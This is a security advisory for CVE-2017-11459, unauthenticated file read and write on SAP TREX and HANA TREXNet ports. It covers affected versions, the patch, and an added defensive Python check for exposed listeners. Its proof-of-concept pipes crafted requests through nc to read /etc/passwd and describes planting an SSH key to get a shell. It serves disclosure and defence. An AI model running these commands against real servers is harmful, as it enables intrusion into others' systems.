ERPScan advisory ERPSCAN-17-019 (Jan 23, 2017)

SAP TREX RCE

2017-01-23 00:00:00
erpscan.io

EPSS: 0.01 (Low), percentile 83.7%

Application: SAP TREX
**Versions Affected:** SAP TREX 7.10
Vendor URL: SAP
**Bugs:** RCE
**Reported:** 23.01.2017
**Vendor response:** 24.01.2017
**Date of Public Advisory:** 11.04.2017
**Reference:** SAP Security Note 2419592
Author: Mathieu Geli (ERPScan)

VULNERABILITY INFORMATION

Class: Missing Authentication for Critical Function
Impact: disclosure of OS files and potentially RCE on the server (example given for Linux)
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-11459

CVSS Information

CVSS v3 Base Score: 9.4 / 10
CVSS v3 Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality High (H)
I: Impact to Integrity High (H)
A: Impact to Availability Low (L)

Description

Some sensitive operations are available anonymously that can be combined to potentially get remote command execution on the server.

Business risk

A Remote Command Execution vulnerability allows an attacker to inject code that the application then executes. The injected commands run with the same privileges as the service that executes them.

VULNERABLE PACKAGES

SAP TREX 7.10.72 (other versions not tested)
SAP HANA SPS12 (1.00.122.01.1470046197I)
SAP HANA 2.0 express edition (2.00.000.00.1479874437I)

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2419592.

TECHNICAL DESCRIPTION

An attacker can send a specially crafted request to the TREXNet ports 3NN01, 3NN02, 3NN03, 3NN04, 3NN06, 3NN07, 3NN08 to read OS files (command 'fget') or create files (command 'fdir'), without any authentication.

If the system is Linux (where SSH is enabled by default), these two operations can be combined to obtain a shell on the server: upload a public key into the service account's ~/.ssh/authorized_keys file and then connect to the server via SSH, taking full control of the TREX daemon's account.
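A defender-side check, added here and not part of the ERPScan advisory: it derives the TREXNet port range 3NN01-3NN09 for a given SAP instance number and parses `ss -ltn` output to report TREXNet listeners bound to anything other than loopback, which is exactly the exposure the unauthenticated fget/fdir commands depend on. The `ss` sample below is constructed for instance 00; the parser assumes the standard `ss -ltn` column layout.

```python
import re

# Constructed sample of `ss -ltn` output (not taken from the advisory).
# Instance number 00, so the TREXNet ports are 30001-30009.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.1:30001      0.0.0.0:*
LISTEN  0       128     0.0.0.0:30003        0.0.0.0:*
LISTEN  0       128     [::]:30007           [::]:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     10.0.0.5:30002       0.0.0.0:*
"""

# TREXNet ports follow the SAP scheme 3NN0X: "3", two-digit instance NN,
# "0", then the service index 1-9 (the advisory's PoC uses 30001-30009).
TREXNET_PORT = re.compile(r"^3(\d\d)0([1-9])$")
LOOPBACK_PREFIXES = ("127.", "::1")


def trexnet_ports(instance):
    """TREXNet ports 3NN01..3NN09 for SAP instance number NN."""
    return [int(f"3{instance:02d}0{i}") for i in range(1, 10)]


def exposed_trexnet_listeners(ss_output):
    """Return (address, port, instance) for every TREXNet listener that is
    not bound to a loopback address, i.e. reachable from the network."""
    exposed = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # handles [::]:port too
        addr = addr.strip("[]")
        match = TREXNET_PORT.match(port)
        if not match or addr.startswith(LOOPBACK_PREFIXES):
            continue
        exposed.append((addr, int(port), int(match.group(1))))
    return exposed


if __name__ == "__main__":
    for addr, port, inst in exposed_trexnet_listeners(SAMPLE_SS_OUTPUT):
        print(f"TREXNet port {port} (instance {inst:02d}) listens on {addr}")
```

Run it against real `ss -ltn` output on a TREX or HANA host; any reported listener should be restricted by firewall or bound to the internal interface until Note 2419592 is applied.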

Proof of Concept

The first attached file "trex_fget_passwd.bin" is a request to dump OS file /etc/passwd on a Unix TREX 7.10 patched server.

You can run the exploit like this:

$ cat trex_fget_passwd.bin | nc <TREXSERVER> 30001

NB: The port can be any of the TREX ports (from 30001 to 30009).

The response should be the content of the /etc/passwd file, like:

at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
[…]

The second file is for HANA SPS12, again dumping /etc/passwd:

$ cat hanaSPS12_fget_passwd.bin | nc <HANASERVER> 30001

NB: The port can be any of the TREX ports (from 30001 to 30009).

The response should be the content of the /etc/passwd file, looking like:

at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
[…]
